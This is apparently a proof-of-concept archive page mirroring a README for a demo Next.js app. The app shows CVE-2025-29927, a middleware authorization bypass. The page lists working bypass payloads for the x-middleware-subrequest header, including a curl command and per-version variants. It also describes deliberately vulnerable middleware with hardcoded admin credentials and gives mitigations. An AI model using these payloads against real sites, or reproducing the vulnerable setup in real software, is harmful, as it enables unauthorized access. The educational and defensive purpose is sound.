Goal Reached Thanks to every supporter β€” we hit 100%!

Goal: 1000 CNY Β· Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-29927 PoC β€” Authorization Bypass in Next.js Middleware

Source
https://github.com/aayush256-sys/next-js-auth-bypass
Associated Vulnerability
Title:Authorization Bypass in Next.js Middleware (CVE-2025-29927)
Description:Next.js is a React framework for building full-stack web applications. Starting in version 1.11.4 and prior to versions 12.3.5, 13.5.9, 14.2.25, and 15.2.3, it is possible to bypass authorization checks within a Next.js application, if the authorization check occurs in middleware. If patching to a safe version is infeasible, it is recommend that you prevent external user requests which contain the x-middleware-subrequest header from reaching your Next.js application. This vulnerability is fixed in 12.3.5, 13.5.9, 14.2.25, and 15.2.3.
Description
πŸ”“ Next.js Auth Bypass Demo - Educational application demonstrating CVE-2025-29927 middleware authentication bypass vulnerability . ⚠️ For educational use only.
Readme
# Hello World - Next.js 12.2

A simple proof of concept Next.js 12.2 application.

## πŸš€ Quick Start

### 1. Install Dependencies
```bash
npm install
```

### 2. Run the Development Server
```bash
npm run dev
```

The application will be available at `http://localhost:3000`


## πŸ› οΈ Available Scripts

- `npm run dev` - Start development server
- `npm run build` - Build for production
- `npm run start` - Start production server

## 🎯 Features

- βœ… **Next.js 12.2** - Latest stable version
- βœ… **React 18.2** - Modern React features
- βœ… **Simple Design** - Clean, responsive UI
- βœ… **Authentication System** - Login with hardcoded credentials
- βœ… **Admin Panel** - Protected dashboard with sensitive data
- βœ… **Vulnerable Middleware** - Demonstrates auth bypass techniques
- βœ… **Exploit Demo** - Easy to reproduce security issues

## πŸ”§ Customization

Edit `pages/index.js` to modify the Hello World page. The application uses inline styles for simplicity, but you can add CSS files or styling libraries as needed.

## πŸ”“ CVE-2025-29927 Security Demo

This application demonstrates the **CVE-2025-29927** vulnerability discovered by Rachid.A (zhero) and Yasser Allam (inzo_):

### πŸ“‹ Vulnerability Details
- **CVE:** CVE-2025-29927
- **CVSS:** 9.1/10 (Critical)
- **Affected:** Next.js 11.1.4 - 15.2.2
- **Impact:** Complete middleware bypass using `x-middleware-subrequest` header

### 🎯 Demo Credentials
- **Username:** `admin`
- **Password:** `admin`

### 🚨 CVE-2025-29927 Exploit Methods
1. **Browser Extension (ModHeader)** - Add `x-middleware-subrequest: middleware` header
2. **JavaScript Console** - Use fetch with the bypass header
3. **cURL Exploit** - `curl -H "x-middleware-subrequest: middleware" http://localhost:3000/admin`
4. **Python Requests** - Add header to bypass middleware completely

### πŸ”§ Payload Variations
- **Next.js 12.2+:** `x-middleware-subrequest: middleware`
- **With /src directory:** `x-middleware-subrequest: src/middleware`
- **Next.js 15.x:** `x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware`


### πŸ›‘οΈ Mitigation
- Update to Next.js 15.2.3+ (14.2.25+ for 14.x)
- Block `x-middleware-subrequest` header at proxy/CDN level
- Implement additional server-side validation

**⚠️ WARNING: This demonstrates a real CVE for educational purposes only!**

## πŸ“¦ Dependencies

- **next**: 12.2.0
- **react**: 18.2.0
- **react-dom**: 18.2.0

## 🎨 Styling

This application uses inline styles for simplicity. For a production app, consider using:
- CSS Modules
- Styled Components
- Tailwind CSS
- Or any other styling solution

---

**Happy coding! πŸš€**
File Snapshot

 [4.0K]  /data/pocs/69091069268e6c9bc81ad389414d22b2a8251cec
β”œβ”€β”€ [ 725]  middleware.js
β”œβ”€β”€ [ 118]  next.config.js
β”œβ”€β”€ [ 268]  package.json
β”œβ”€β”€ [ 14K]  package-lock.json
β”œβ”€β”€ [4.0K]  pages
β”‚Β Β  β”œβ”€β”€ [7.1K]  admin.js
β”‚Β Β  β”œβ”€β”€ [4.0K]  api
β”‚Β Β  β”‚Β Β  β”œβ”€β”€ [ 615]  login.js
β”‚Β Β  β”‚Β Β  └── [ 381]  logout.js
β”‚Β Β  β”œβ”€β”€ [  96]  _app.js
β”‚Β Β  β”œβ”€β”€ [3.9K]  index.js
β”‚Β Β  └── [4.3K]  login.js
└── [2.6K]  README.md

2 directories, 11 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers β€” if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online β€” thank you for the support. View subscription plans β†’